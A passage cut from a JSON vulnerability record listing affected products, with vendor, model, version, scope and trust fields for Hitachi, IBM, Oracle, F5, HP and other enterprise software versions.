            "_id": null,
            "model": "device manager software",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.1.1-03"
          },
          {
            "_id": null,
            "model": "device manager software )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.2-00"
          },
          {
            "_id": null,
            "model": "tiered storage manager software )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.1-00"
          },
          {
            "_id": null,
            "model": "tiered storage manager software",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.1.1-00"
          },
          {
            "_id": null,
            "model": "device manager software )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.2-01"
          },
          {
            "_id": null,
            "model": "device manager software",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.2-01"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "-08-11-08"
          },
          {
            "_id": null,
            "model": "device manager software )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.1.1-00"
          },
          {
            "_id": null,
            "model": "device manager software",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.2-00"
          },
          {
            "_id": null,
            "model": "tiered storage manager software )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.1.1-00"
          },
          {
            "_id": null,
            "model": "jp1/performance management manager web option",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "-07-00"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "-08-00-12"
          },
          {
            "_id": null,
            "model": "tiered storage manager software",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.1-00"
          },
          {
            "_id": null,
            "model": "tiered storage manager software",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.2-00"
          },
          {
            "_id": null,
            "model": "device manager software",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.1-03"
          },
          {
            "_id": null,
            "model": "tiered storage manager software )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.1-01"
          },
          {
            "_id": null,
            "model": "device manager software",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.1-00"
          },
          {
            "_id": null,
            "model": "tuning manager software",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "7.6.1-05"
          },
          {
            "_id": null,
            "model": "device manager software",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.1-02"
          },
          {
            "_id": null,
            "model": "device manager software )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.1.1-04"
          },
          {
            "_id": null,
            "model": "infosphere information server",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "tiered storage manager software )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.1.1-01"
          },
          {
            "_id": null,
            "model": "tuning manager software",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "7.4.0-02"
          },
          {
            "_id": null,
            "model": "device manager software",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.1.1-00"
          },
          {
            "_id": null,
            "model": "tuning manager software",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "7.4.0-01"
          },
          {
            "_id": null,
            "model": "infosphere information server",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "device manager software",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.0-06"
          },
          {
            "_id": null,
            "model": "device manager software )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.2-02"
          },
          {
            "_id": null,
            "model": "device manager software",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.2-02"
          },
          {
            "_id": null,
            "model": "device manager software",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.0-00"
          },
          {
            "_id": null,
            "model": "tuning manager software",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "8.0.0-03"
          },
          {
            "_id": null,
            "model": "tiered storage manager software )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.2-00"
          },
          {
            "_id": null,
            "model": "tiered storage manager software )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.2-01"
          },
          {
            "_id": null,
            "model": "tiered storage manager software",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.2-01"
          },
          {
            "_id": null,
            "model": "tuning manager software",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "8.0.0-04"
          },
          {
            "_id": null,
            "model": "device manager software )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.1-02"
          },
          {
            "_id": null,
            "model": "device manager software",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.1.1-04"
          },
          {
            "_id": null,
            "model": "device manager software",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "7.0.0-00"
          },
          {
            "_id": null,
            "model": "jp1/performance management manager web option",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "-07-54"
          },
          {
            "_id": null,
            "model": "infosphere information server",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "ibm",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "infosphere information server",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "ibm",
            "version": "8.7"
          },
          {
            "_id": null,
            "model": "tiered storage manager software",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.1-01"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "-08-10-08"
          },
          {
            "_id": null,
            "model": "tiered storage manager software",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "6.1.1-01"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "-08-10-00"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.17"
          },
          {
            "_id": null,
            "model": "openpages",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "device manager software (linux(suse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-05"
          },
          {
            "_id": null,
            "model": "retail allocation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.0"
          },
          {
            "_id": null,
            "model": "primavera p6 enterprise project portfolio management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "distributed marketing",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "utilities framework",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "4.3.0.3.0"
          },
          {
            "_id": null,
            "model": "device manager software (solaris(sp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.4.0-07"
          },
          {
            "_id": null,
            "model": "global link manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.6-00"
          },
          {
            "_id": null,
            "model": "security qradar",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "tivoli storage manager administration center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "tivoli workload scheduler z/os connector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "records manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "retail clearance optimization engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.4"
          },
          {
            "_id": null,
            "model": "retail back office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "tuning manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.401"
          },
          {
            "_id": null,
            "model": "tuning manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.0.0-00"
          },
          {
            "_id": null,
            "model": "big-ip aam",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.5"
          },
          {
            "_id": null,
            "model": "social media analytics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.3"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-09-00"
          },
          {
            "_id": null,
            "model": "terasoluna server framework for java",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ntt data",
            "version": "2.0.5.2"
          },
          {
            "_id": null,
            "model": "global link manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.2-00"
          },
          {
            "_id": null,
            "model": "device manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.0.1-02"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator hf7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1.0"
          },
          {
            "_id": null,
            "model": "lotus expeditor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "vcenter server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "primavera p6 enterprise project portfolio management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "15.1"
          },
          {
            "_id": null,
            "model": "business process manager standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.5"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.2"
          },
          {
            "_id": null,
            "model": "device manager software (linux(rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.0.0-00"
          },
          {
            "_id": null,
            "model": "device manager software (solaris(x6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.6.1-05"
          },
          {
            "_id": null,
            "model": "device manager software (solaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.0-06(x64))"
          },
          {
            "_id": null,
            "model": "tuning manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "3.5.0"
          },
          {
            "_id": null,
            "model": "device manager software (linux(suse",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-06"
          },
          {
            "_id": null,
            "model": "fuse esb enterprise",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "7.1.0"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.43"
          },
          {
            "_id": null,
            "model": "ds8870",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "tiered storage manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-05"
          },
          {
            "_id": null,
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "retail invoice matching",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.0"
          },
          {
            "_id": null,
            "model": "knowledge",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.6.0"
          },
          {
            "_id": null,
            "model": "tiered storage manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.6.1-05"
          },
          {
            "_id": null,
            "model": "rational reporting for development intelligence",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.0.2"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.13"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "tiered storage manager software (linux(suse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-00"
          },
          {
            "_id": null,
            "model": "tivoli endpoint manager for remote control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.1"
          },
          {
            "_id": null,
            "model": "retail returns management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.4"
          },
          {
            "_id": null,
            "model": "content analytics with enterprise search",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "business process manager advanced",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.0"
          },
          {
            "_id": null,
            "model": "xp p9000 tiered storage manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "1.1.0-00"
          },
          {
            "_id": null,
            "model": "retail back office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.3"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.0.47"
          },
          {
            "_id": null,
            "model": "websphere portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.5"
          },
          {
            "_id": null,
            "model": "tivoli dynamic workload console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.6.0.0"
          },
          {
            "_id": null,
            "model": "retail back office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "14.0"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "linux enterprise software development kit sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "11"
          },
          {
            "_id": null,
            "model": "utilities framework",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "4.3.0.1.0"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway hf5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2.1"
          },
          {
            "_id": null,
            "model": "rational insight",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.1"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "secure analytics 2013.2r8",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": "tivoli endpoint manager for remote control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.2"
          },
          {
            "_id": null,
            "model": "tivoli storage productivity center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "job management partner 1/performance management web console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-0"
          },
          {
            "_id": null,
            "model": "device manager software (linux(sles",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.0.0-00"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.41"
          },
          {
            "_id": null,
            "model": "content manager records enabler",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "device manager software )",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.0-06"
          },
          {
            "_id": null,
            "model": "tivoli integrated portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.1.19"
          },
          {
            "_id": null,
            "model": "openpages grc platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.2.1"
          },
          {
            "_id": null,
            "model": "content navigator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.1"
          },
          {
            "_id": null,
            "model": "device manager software )",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.3-00"
          },
          {
            "_id": null,
            "model": "primavera contract management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "14.0"
          },
          {
            "_id": null,
            "model": "tuning manager software (linux(rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-00"
          },
          {
            "_id": null,
            "model": "websphere portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "openpages",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "business process manager standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.x"
          },
          {
            "_id": null,
            "model": "device manager software (solaris",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.1.1-04(x64))"
          },
          {
            "_id": null,
            "model": "business server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "1"
          },
          {
            "_id": null,
            "model": "tivoli endpoint manager for remote control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.2.1"
          },
          {
            "_id": null,
            "model": "retail back office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.1"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.0.43"
          },
          {
            "_id": null,
            "model": "device manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-05"
          },
          {
            "_id": null,
            "model": "primavera p6 enterprise project portfolio management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "weblogic server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.1.10"
          },
          {
            "_id": null,
            "model": "jboss operations network",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3.2.1"
          },
          {
            "_id": null,
            "model": "primavera p6 enterprise project portfolio management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.3"
          },
          {
            "_id": null,
            "model": "device manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "1.0.0-00"
          },
          {
            "_id": null,
            "model": "content navigator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "device manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.6.1-05"
          },
          {
            "_id": null,
            "model": "xp7 global link manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.4.0-00"
          },
          {
            "_id": null,
            "model": "raplication manager software (linux(rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-05"
          },
          {
            "_id": null,
            "model": "xp p9000 tiered storage manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "8.0.0-00"
          },
          {
            "_id": null,
            "model": "websphere partner gateway advanced edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "weblogic portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.0.1.0"
          },
          {
            "_id": null,
            "model": "retail back office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.0"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.42"
          },
          {
            "_id": null,
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "global link manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.5-00"
          },
          {
            "_id": null,
            "model": "tiered storage manager software",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-06"
          },
          {
            "_id": null,
            "model": "device manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.5.0-02"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator hf1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.2.1"
          },
          {
            "_id": null,
            "model": "sitescope",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "11.20"
          },
          {
            "_id": null,
            "model": "primavera contract management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.1"
          },
          {
            "_id": null,
            "model": "xp p9000 tiered storage manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "8.0.0-06"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "tiered storage manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.0.0-00"
          },
          {
            "_id": null,
            "model": "tuning manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.2-01"
          },
          {
            "_id": null,
            "model": "jp1/performance management web console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "-08-10-07"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.27"
          },
          {
            "_id": null,
            "model": "tiered storage manager software (solaris(sp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.0.0-00"
          },
          {
            "_id": null,
            "model": "device manager software (linux(rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-05"
          },
          {
            "_id": null,
            "model": "knowledge",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.5.1.7"
          },
          {
            "_id": null,
            "model": "websphere lombardi edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.0"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "lotus expeditor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.2.2"
          },
          {
            "_id": null,
            "model": "device manager software (linux(rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.6.1-05"
          },
          {
            "_id": null,
            "model": "device manager software (linux(rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.4.0-07"
          },
          {
            "_id": null,
            "model": "campaign",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "tivoli provisioning manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "arx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "tivoli storage productivity center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.2.1"
          },
          {
            "_id": null,
            "model": "tuning manager software (linux(suse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-00"
          },
          {
            "_id": null,
            "model": "websphere sensor events",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "openpages",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.1.5"
          },
          {
            "_id": null,
            "model": "tuning manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.1.0"
          },
          {
            "_id": null,
            "model": "security threat response manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "2012.1"
          },
          {
            "_id": null,
            "model": "retail central office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.2"
          },
          {
            "_id": null,
            "model": "xp p9000 replication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.0.0-00"
          },
          {
            "_id": null,
            "model": "connections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.10"
          },
          {
            "_id": null,
            "model": "tuning manager software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.2.1-00"
          },
          {
            "_id": null,
            "model": "qradar siem mr2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "arx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "6.4"
          },
          {
            "_id": null,
            "model": "tivoli dynamic workload console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "big-ip edge gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "11.1"
          },
          {
            "_id": null,
            "model": "websphere service registry and repository",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "tivoli workload scheduler distributed",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.1"
          },
          {
            "_id": null,
            "model": "filenet p8 platform content search engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "tivoli identity manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "tivoli netcool/omnibus web gui",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.4"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.0.35"
          },
          {
            "_id": null,
            "model": "tuning manager software (solaris(x6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.6.1-05"
          },
          {
            "_id": null,
            "model": "tivoli composite application manager for websphere",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "tiered storage manager software (linux(rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "6.4.0-08"
          },
          {
            "_id": null,
            "model": "ds8870",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.3"
          },
          {
            "_id": null,
            "model": "raplication manager software (linux(suse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "8.0.0-00"
          },
          {
            "_id": null,
            "model": "tuning manager software )",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hitachi",
            "version": "7.001"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.5"
          },
          {
            "_id": null,
            "model": "qradar siem mr5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "communications webrtc session controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "arx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.07"
          },
          {
            "_id": null,
            "model": "infosphere identity insight",
            "scope": "eq",
            "trust": 0.3,
